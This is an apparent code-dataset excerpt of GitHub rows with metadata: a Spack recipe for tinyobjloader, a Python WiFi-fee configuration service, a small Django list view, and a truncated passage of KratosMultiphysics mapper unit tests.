| true
|
1c4926361dab09cb57d6a664d216e7a0e927ff3b
| 630
|
py
|
Python
|
var/spack/repos/builtin/packages/tinyobjloader/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/tinyobjloader/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2021-11-09T20:28:40.000Z
|
2022-03-15T03:26:33.000Z
|
var/spack/repos/builtin/packages/tinyobjloader/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-08T20:37:20.000Z
|
2019-03-31T15:19:26.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Tinyobjloader(CMakePackage):
"""Tiny but powerful single file wavefront obj loader."""
homepage = "https://github.com/tinyobjloader/tinyobjloader"
url = "https://github.com/tinyobjloader/tinyobjloader/archive/refs/tags/v1.0.6.tar.gz"
version('1.0.6', sha256='19ee82cd201761954dd833de551edb570e33b320d6027e0d91455faf7cd4c341')
depends_on('cmake@2.8.11:', type='build')
| 35
| 95
| 0.749206
|
from spack.package import *
class Tinyobjloader(CMakePackage):
homepage = "https://github.com/tinyobjloader/tinyobjloader"
url = "https://github.com/tinyobjloader/tinyobjloader/archive/refs/tags/v1.0.6.tar.gz"
version('1.0.6', sha256='19ee82cd201761954dd833de551edb570e33b320d6027e0d91455faf7cd4c341')
depends_on('cmake@2.8.11:', type='build')
| true
| true
|
1c49296bf4eb5e9772b93dad7e955a46f4cb4516
| 11,549
|
py
|
Python
|
bg_biz/service/config_service.py
|
sluggard6/bgirl
|
3c9fa895189ef16442694830d0c05cf60ee5187b
|
[
"Apache-2.0"
] | null | null | null |
bg_biz/service/config_service.py
|
sluggard6/bgirl
|
3c9fa895189ef16442694830d0c05cf60ee5187b
|
[
"Apache-2.0"
] | null | null | null |
bg_biz/service/config_service.py
|
sluggard6/bgirl
|
3c9fa895189ef16442694830d0c05cf60ee5187b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
from datetime import datetime
import json
from flask import current_app, g
from sqlalchemy import and_, or_
from sharper.flaskapp.orm.display_enum import DisplayEnum
from sharper.lib.error import AppError
from sharper.util.app_util import get_package_name
import time
from sharper.util.file import get_file_fix
from sharper.util import area_util
from bg_biz.orm.sysconfig import SysConfig
__author__ = [
'"liubo" <liubo@hi-wifi.cn>'
]
class ConfigService(object):
class Host(DisplayEnum):
API = "api"
MOBILE = "mobile"
CARD = "card"
PORTAL = "portal"
REGISTER = "register"
STATIC = "static"
STATIC_HTTPS = "static_https"
STATIC_CDN = 'static_cdn'
ADMIN = 'admin'
PAUTH = 'pauth'
__display_cn__ = {
API: u"api",
MOBILE: u"移动版",
CARD: u"充值卡",
PORTAL: u"PORTAL页",
REGISTER: u"注册应用",
STATIC: u"静态资源",
STATIC_HTTPS: u"静态资源https",
STATIC_CDN: u"静态资源CDN",
ADMIN: u"后台",
PAUTH: u"认证服务器"
}
@classmethod
def get_month_fee(cls, month, area_id=None):
for month_config in cls.get_month_fee_config(area_id):
if month == month_config.get('month'):
return month_config.get('amount')
raise AppError(u"")
@classmethod
def get_month_fee_config(cls, area_id=None):
yingkou_area_ids = SysConfig.get_json("yingkou_area_ids")
        # the Yingkou Foxconn unit price is configured separately; refactor this when the portal is migrated
config_name = "month_fee_price"
if area_id:
if area_id in yingkou_area_ids:
config_name = "month_fee_price_yingkou"
else:
area_config = SysConfig.get_json("area_config")
area_id_str = str(area_id)
if area_id_str in area_config and area_config.get(area_id_str) == "foxconn":
config_name = "month_fee_price_foxconn"
else:
            # separate config for Foxconn
if area_util.is_foxconn():
config_name = "month_fee_price_foxconn"
return SysConfig.get_json(config_name)
@classmethod
def get_host(cls, host):
host_config = SysConfig.get_json("hosts")
return host_config.get(host)
@classmethod
def __update_info_key__(cls, apk_info, is_preview=False):
if apk_info['is_foxconn']:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
package_name = apk_info['package_name']
if package_name.find("com.jz") != -1:
key = "%s_old" % key
return key
@classmethod
def update_app_info(cls, apk_info, content, is_preview=False):
key = cls.__update_info_key__(apk_info, is_preview=is_preview)
config = SysConfig.get(key)
update_info = json.loads(config.value)
update_info['code'] = apk_info['version_code']
update_info['name'] = apk_info['version_name']
update_info['time'] = int(round(time.time() * 1000))
update_info['content'] = content
update_info['size'] = apk_info['size']
config.value = json.dumps(update_info)
config.update()
return True
@classmethod
def __get_info_key__(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
        '''
        For client access
        '''
if not is_foxconn:
is_foxconn = area_util.is_foxconn()
if is_foxconn:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
elif user:
            # grey-release (canary) configuration
preview_config = SysConfig.get_json("grey_dist")
if preview_config.get('active', False):
if user.area_id and user.area_id in preview_config.get('area_ids'):
key = "%s_preview" % key
        # use the package name to decide whether this is the old package; the old package keeps being maintained on the old version
if not is_old:
package_name = get_package_name()
if package_name.find("com.jz") != -1:
is_old = True
if is_old:
key = "%s_old" % key
return key
@classmethod
def get_app_update_info(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
key = cls.__get_info_key__(is_foxconn=is_foxconn, user=user, is_preview=is_preview, is_old=is_old)
return SysConfig.get_json(key)
@classmethod
def get_wifi_score(cls, day):
for score_config in cls.get_wifi_score_config():
if day == score_config.get('day'):
return score_config.get('score')
return None
@classmethod
def get_wifi_score_config(cls):
        # separate config for Foxconn
if area_util.is_foxconn():
config_name = "wifi_score_foxconn"
else:
config_name = "wifi_score"
return SysConfig.get_json(config_name)
@classmethod
def get_close_wifi_fee(cls, amount):
        config = sorted(filter(lambda x: int(x["amount"]) >= amount, cls.get_wifi_fee_config()), key=lambda x: x["amount"],
                        reverse=True)
return config[0]["amount"] if config else None
@classmethod
def get_wifi_fee(cls, day, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None, with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if day == fee_config.get('day'):
return fee_config.get('amount')
raise AppError(u"")
@classmethod
def get_wifi_day(cls, amount, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if amount == fee_config.get('amount'):
return fee_config.get('day')
# raise AppError(u"")
return 0
@classmethod
def get_wifi_fee_config(cls, type=None, area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
if type == "apple":
config = SysConfig.get_json("wifi_fee_apple")
else:
            # special areas have a recharge price of 5 yuan for 30 days, e.g. Yingkou area id 54
special_wifi_fee_config = SysConfig.get_json("special_wifi_fee_config")
special_wifi_fee_config = special_wifi_fee_config if special_wifi_fee_config else {}
is_special = False
if special_wifi_fee_config.has_key(str(area_id)):
is_special = True
            # Tongliang
if area_id == 188:
config_name = "wifi_fee_tl"
config = SysConfig.get_json(config_name)
elif is_special:
config = special_wifi_fee_config[str(area_id)]
else:
if type == "portal":
config_name = "wifi_fee_portal"
elif type == "card":
config_name = "wifi_fee_card"
else:
if area_util.is_foxconn():
config_name = "wifi_fee_foxconn"
else:
config_name = "wifi_fee"
config = SysConfig.get_json(config_name)
if with_discount:
discount_rule = DiscountRule.query.filter_by(category=DiscountRule.Category.WIFI).\
filter(and_(or_(DiscountRule.start_time<datetime.now(),DiscountRule.start_time==None),or_(DiscountRule.end_time>datetime.now(),DiscountRule.start_time==None)))\
.filter_by(display_type=DiscountRule.DisplayType.ALL).order_by(DiscountRule.rank).first()
for w in config:
if discount_rule:
if w["day"]==int(discount_rule.product):
if discount_rule.type == DiscountRule.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_rule.discount)/100)
elif discount_rule.type == DiscountRule.Type.DEL:
w["amount"] = w["amount"]-float(discount_rule.discount)
w["msg"] = discount_rule.name
w["discount_info"] = discount_rule.key
if not w.has_key("discount_info") and user:
discount_user_rule = UserDiscountInfo.query.filter_by(user_id=user.id).filter_by(product=str(w['day'])).filter_by(category=UserDiscountInfo.Category.WIFI).\
filter(and_(or_(UserDiscountInfo.start_time<datetime.now(),UserDiscountInfo.start_time==None),or_(UserDiscountInfo.end_time>datetime.now(),UserDiscountInfo.start_time==None)))\
.filter_by(status=UserDiscountInfo.Status.NEW).order_by(UserDiscountInfo.create_time).first()
if discount_user_rule:
if discount_user_rule.type == UserDiscountInfo.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_user_rule.discount)/100)
elif discount_user_rule.type == UserDiscountInfo.Type.DEL:
w["amount"] = w["amount"]-float(discount_user_rule.discount)
w["msg"] = discount_user_rule.name
w["discount_info"] = discount_user_rule.key
w["discount_id"] = discount_user_rule.id
return config
@classmethod
def get_image_url(cls, image):
return "%s/image/%s" % (cls.get_host(cls.Host.STATIC), image) if image else None
@classmethod
def get_apk_url(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC), apk_path) if apk_path else None
@classmethod
def get_apk_url_https(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC_CDN), apk_path) if apk_path else None
@classmethod
def get_avatar_url(cls, avatar):
return "%s/avatar/%s" % (cls.get_host(cls.Host.STATIC), avatar) if avatar else None
@classmethod
def load_photo_http_all(cls, uri):
def get_media_handler_ext_fix_path(file_path, media_type, handler):
ext = current_app.config['UPLOAD_HANDLER'][media_type]['handlers'][handler].get('ext')
return get_file_fix(file_path, ext) if ext else file_path
http_ref = "%s/photo/" % cls.get_host(cls.Host.STATIC_CDN)
sdd = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'standard')
thumb = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'thumb')
dic = dict(
big=http_ref + uri,
standard=sdd,
small=sdd,
thumb=thumb,
thumb_small=thumb
)
return dic['big'], dic['standard'], dic['small'], dic['thumb'], dic['thumb_small']
@classmethod
def get_area_by_id(cls, area_id):
area_config = SysConfig.get_json("area_config")
from sharper.util import area_util
area = area_util.Area.NORMAL
if str(area_id) in area_config:
area = area_config.get(str(area_id))
return area
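
# Illustrative sketch (not part of the original service): how the two
# discount rule types applied in get_wifi_fee_config adjust a price. The
# amount and discount values below are hypothetical.
_amount = 30.0
_percent_price = _amount * (50 / 100.0)  # Type.PERCENT with discount=50 -> 15.0
_del_price = _amount - 5.0               # Type.DEL with discount=5 -> 25.0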
| 41.844203
| 201
| 0.591393
|
from datetime import datetime
import json
from flask import current_app, g
from sqlalchemy import and_, or_
from sharper.flaskapp.orm.display_enum import DisplayEnum
from sharper.lib.error import AppError
from sharper.util.app_util import get_package_name
import time
from sharper.util.file import get_file_fix
from sharper.util import area_util
from bg_biz.orm.sysconfig import SysConfig
__author__ = [
'"liubo" <liubo@hi-wifi.cn>'
]
class ConfigService(object):
class Host(DisplayEnum):
API = "api"
MOBILE = "mobile"
CARD = "card"
PORTAL = "portal"
REGISTER = "register"
STATIC = "static"
STATIC_HTTPS = "static_https"
STATIC_CDN = 'static_cdn'
ADMIN = 'admin'
PAUTH = 'pauth'
__display_cn__ = {
API: u"api",
MOBILE: u"移动版",
CARD: u"充值卡",
PORTAL: u"PORTAL页",
REGISTER: u"注册应用",
STATIC: u"静态资源",
STATIC_HTTPS: u"静态资源https",
STATIC_CDN: u"静态资源CDN",
ADMIN: u"后台",
PAUTH: u"认证服务器"
}
@classmethod
def get_month_fee(cls, month, area_id=None):
for month_config in cls.get_month_fee_config(area_id):
if month == month_config.get('month'):
return month_config.get('amount')
raise AppError(u"")
@classmethod
def get_month_fee_config(cls, area_id=None):
yingkou_area_ids = SysConfig.get_json("yingkou_area_ids")
config_name = "month_fee_price"
if area_id:
if area_id in yingkou_area_ids:
config_name = "month_fee_price_yingkou"
else:
area_config = SysConfig.get_json("area_config")
area_id_str = str(area_id)
if area_id_str in area_config and area_config.get(area_id_str) == "foxconn":
config_name = "month_fee_price_foxconn"
else:
if area_util.is_foxconn():
config_name = "month_fee_price_foxconn"
return SysConfig.get_json(config_name)
@classmethod
def get_host(cls, host):
host_config = SysConfig.get_json("hosts")
return host_config.get(host)
@classmethod
def __update_info_key__(cls, apk_info, is_preview=False):
if apk_info['is_foxconn']:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
package_name = apk_info['package_name']
if package_name.find("com.jz") != -1:
key = "%s_old" % key
return key
@classmethod
def update_app_info(cls, apk_info, content, is_preview=False):
key = cls.__update_info_key__(apk_info, is_preview=is_preview)
config = SysConfig.get(key)
update_info = json.loads(config.value)
update_info['code'] = apk_info['version_code']
update_info['name'] = apk_info['version_name']
update_info['time'] = int(round(time.time() * 1000))
update_info['content'] = content
update_info['size'] = apk_info['size']
config.value = json.dumps(update_info)
config.update()
return True
@classmethod
def __get_info_key__(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
if not is_foxconn:
is_foxconn = area_util.is_foxconn()
if is_foxconn:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
elif user:
preview_config = SysConfig.get_json("grey_dist")
if preview_config.get('active', False):
if user.area_id and user.area_id in preview_config.get('area_ids'):
key = "%s_preview" % key
if not is_old:
package_name = get_package_name()
if package_name.find("com.jz") != -1:
is_old = True
if is_old:
key = "%s_old" % key
return key
@classmethod
def get_app_update_info(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
key = cls.__get_info_key__(is_foxconn=is_foxconn, user=user, is_preview=is_preview, is_old=is_old)
return SysConfig.get_json(key)
@classmethod
def get_wifi_score(cls, day):
for score_config in cls.get_wifi_score_config():
if day == score_config.get('day'):
return score_config.get('score')
return None
@classmethod
def get_wifi_score_config(cls):
if area_util.is_foxconn():
config_name = "wifi_score_foxconn"
else:
config_name = "wifi_score"
return SysConfig.get_json(config_name)
@classmethod
def get_close_wifi_fee(cls, amount):
        config = sorted(filter(lambda x: int(x["amount"]) >= amount, cls.get_wifi_fee_config()), key=lambda x: x["amount"],
                        reverse=True)
return config[0]["amount"] if config else None
@classmethod
def get_wifi_fee(cls, day, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None, with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if day == fee_config.get('day'):
return fee_config.get('amount')
raise AppError(u"")
@classmethod
def get_wifi_day(cls, amount, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if amount == fee_config.get('amount'):
return fee_config.get('day')
return 0
@classmethod
def get_wifi_fee_config(cls, type=None, area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
if type == "apple":
config = SysConfig.get_json("wifi_fee_apple")
else:
special_wifi_fee_config = SysConfig.get_json("special_wifi_fee_config")
special_wifi_fee_config = special_wifi_fee_config if special_wifi_fee_config else {}
is_special = False
if special_wifi_fee_config.has_key(str(area_id)):
is_special = True
if area_id == 188:
config_name = "wifi_fee_tl"
config = SysConfig.get_json(config_name)
elif is_special:
config = special_wifi_fee_config[str(area_id)]
else:
if type == "portal":
config_name = "wifi_fee_portal"
elif type == "card":
config_name = "wifi_fee_card"
else:
if area_util.is_foxconn():
config_name = "wifi_fee_foxconn"
else:
config_name = "wifi_fee"
config = SysConfig.get_json(config_name)
if with_discount:
discount_rule = DiscountRule.query.filter_by(category=DiscountRule.Category.WIFI).\
filter(and_(or_(DiscountRule.start_time<datetime.now(),DiscountRule.start_time==None),or_(DiscountRule.end_time>datetime.now(),DiscountRule.start_time==None)))\
.filter_by(display_type=DiscountRule.DisplayType.ALL).order_by(DiscountRule.rank).first()
for w in config:
if discount_rule:
if w["day"]==int(discount_rule.product):
if discount_rule.type == DiscountRule.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_rule.discount)/100)
elif discount_rule.type == DiscountRule.Type.DEL:
w["amount"] = w["amount"]-float(discount_rule.discount)
w["msg"] = discount_rule.name
w["discount_info"] = discount_rule.key
if not w.has_key("discount_info") and user:
discount_user_rule = UserDiscountInfo.query.filter_by(user_id=user.id).filter_by(product=str(w['day'])).filter_by(category=UserDiscountInfo.Category.WIFI).\
filter(and_(or_(UserDiscountInfo.start_time<datetime.now(),UserDiscountInfo.start_time==None),or_(UserDiscountInfo.end_time>datetime.now(),UserDiscountInfo.start_time==None)))\
.filter_by(status=UserDiscountInfo.Status.NEW).order_by(UserDiscountInfo.create_time).first()
if discount_user_rule:
if discount_user_rule.type == UserDiscountInfo.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_user_rule.discount)/100)
elif discount_user_rule.type == UserDiscountInfo.Type.DEL:
w["amount"] = w["amount"]-float(discount_user_rule.discount)
w["msg"] = discount_user_rule.name
w["discount_info"] = discount_user_rule.key
w["discount_id"] = discount_user_rule.id
return config
@classmethod
def get_image_url(cls, image):
return "%s/image/%s" % (cls.get_host(cls.Host.STATIC), image) if image else None
@classmethod
def get_apk_url(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC), apk_path) if apk_path else None
@classmethod
def get_apk_url_https(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC_CDN), apk_path) if apk_path else None
@classmethod
def get_avatar_url(cls, avatar):
return "%s/avatar/%s" % (cls.get_host(cls.Host.STATIC), avatar) if avatar else None
@classmethod
def load_photo_http_all(cls, uri):
def get_media_handler_ext_fix_path(file_path, media_type, handler):
ext = current_app.config['UPLOAD_HANDLER'][media_type]['handlers'][handler].get('ext')
return get_file_fix(file_path, ext) if ext else file_path
http_ref = "%s/photo/" % cls.get_host(cls.Host.STATIC_CDN)
sdd = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'standard')
thumb = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'thumb')
dic = dict(
big=http_ref + uri,
standard=sdd,
small=sdd,
thumb=thumb,
thumb_small=thumb
)
return dic['big'], dic['standard'], dic['small'], dic['thumb'], dic['thumb_small']
@classmethod
def get_area_by_id(cls, area_id):
area_config = SysConfig.get_json("area_config")
from sharper.util import area_util
area = area_util.Area.NORMAL
if str(area_id) in area_config:
area = area_config.get(str(area_id))
return area
| true
| true
|
1c492a326a630c0812bf986265152c0cc4352601
| 235
|
py
|
Python
|
.history/myblog/views_20200416030503.py
|
abhinavmarwaha/demo-django-blog
|
c80a7d825e44d7e1589d9272c3583764562a2515
|
[
"MIT"
] | null | null | null |
.history/myblog/views_20200416030503.py
|
abhinavmarwaha/demo-django-blog
|
c80a7d825e44d7e1589d9272c3583764562a2515
|
[
"MIT"
] | null | null | null |
.history/myblog/views_20200416030503.py
|
abhinavmarwaha/demo-django-blog
|
c80a7d825e44d7e1589d9272c3583764562a2515
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.views import generic
from .models import Post
class PostList(generic.ListView):
queryset = Post.objects.filter(status=1).order_by('-created_on')
    template_name = 'index.html'
| 23.5
| 68
| 0.761702
|
from django.shortcuts import render
from django.views import generic
from .models import Post
class PostList(generic.ListView):
queryset = Post.objects.filter(status=1).order_by('-created_on')
    template_name = 'index.html'
| true
| true
|
1c492bb5767583c8fa3013ba7fd04abc59028ca4
| 14,503
|
py
|
Python
|
applications/MappingApplication/tests/basic_mapper_tests.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 2
|
2019-10-25T09:28:10.000Z
|
2019-11-21T12:51:46.000Z
|
applications/MappingApplication/tests/basic_mapper_tests.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 13
|
2019-10-07T12:06:51.000Z
|
2020-02-18T08:48:33.000Z
|
applications/MappingApplication/tests/basic_mapper_tests.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | null | null | null |
from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import KratosMultiphysics as KM
import KratosMultiphysics.MappingApplication as KratosMapping
data_comm = KM.DataCommunicator.GetDefault()
import mapper_test_case
from math import sin, cos
import os
def GetFilePath(file_name):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), file_name)
class BasicMapperTests(mapper_test_case.MapperTestCase):
    '''This class contains basic tests that every mapper should pass.
    This includes e.g. testing whether mapping a constant field works.
    It also checks that the mapper flags are working correctly.
    '''
@classmethod
def setUpMapper(cls, mapper_parameters, switch_sides=False):
if switch_sides:
super(BasicMapperTests, cls).setUpModelParts("cube_quad", "cube_tri")
else:
super(BasicMapperTests, cls).setUpModelParts("cube_tri", "cube_quad")
# TODO ATTENTION: currently the MapperFactory removes some keys, hence those checks have to be done beforehand => improve this!
cls.mapper_type = mapper_parameters["mapper_type"].GetString()
if mapper_parameters.Has("interface_submodel_part_origin"):
cls.interface_model_part_origin = cls.model_part_origin.GetSubModelPart(
mapper_parameters["interface_submodel_part_origin"].GetString())
else:
cls.interface_model_part_origin = cls.model_part_origin
if mapper_parameters.Has("interface_submodel_part_destination"):
cls.interface_model_part_destination = cls.model_part_destination.GetSubModelPart(
mapper_parameters["interface_submodel_part_destination"].GetString())
else:
cls.interface_model_part_destination = cls.model_part_destination
if data_comm.IsDistributed():
cls.mapper = KratosMapping.MapperFactory.CreateMPIMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
else:
cls.mapper = KratosMapping.MapperFactory.CreateMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
def test_Map_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val)
def test_InverseMap_constant_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val)
def test_Map_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val)
def test_InverseMap_constant_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val)
def test_Map_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_origin.Nodes, KM.PRESSURE)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.TEMPERATURE, GetFilePath(self.__GetFileName("map_scalar")))
def test_InverseMap_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_destination.Nodes, KM.TEMPERATURE)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.PRESSURE, GetFilePath(self.__GetFileName("inverse_map_scalar")))
def test_Map_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_origin.Nodes, KM.FORCE)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.VELOCITY, GetFilePath(self.__GetFileName("map_vector")))
def test_InverseMap_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_destination.Nodes, KM.VELOCITY)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.FORCE, GetFilePath(self.__GetFileName("inverse_map_vector")))
def test_SWAP_SIGN_Map_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, -val)
def test_SWAP_SIGN_InverseMap_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, -val)
def test_SWAP_SIGN_Map_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, [(-1)*x for x in val])
def test_SWAP_SIGN_InverseMap_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, [(-1)*x for x in val])
def test_ADD_VALUES_Map_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE) # set the initial field
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1+val_2)
def test_ADD_VALUES_InverseMap_scalar(self):
val_1 = -571.147
val_2 = 128.336
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val_1+val_2)
def test_ADD_VALUES_Map_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY) # set the initial field
KM.VariableUtils().SetVectorVar(KM.FORCE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val_1+val_2)
def test_ADD_VALUES_InverseMap_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY) # set the initial field
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val_1+val_2)
def test_SWAP_SIGN_and_ADD_VALUES_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE) # set the initial field
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES | KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1-val_2)
def test_Map_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
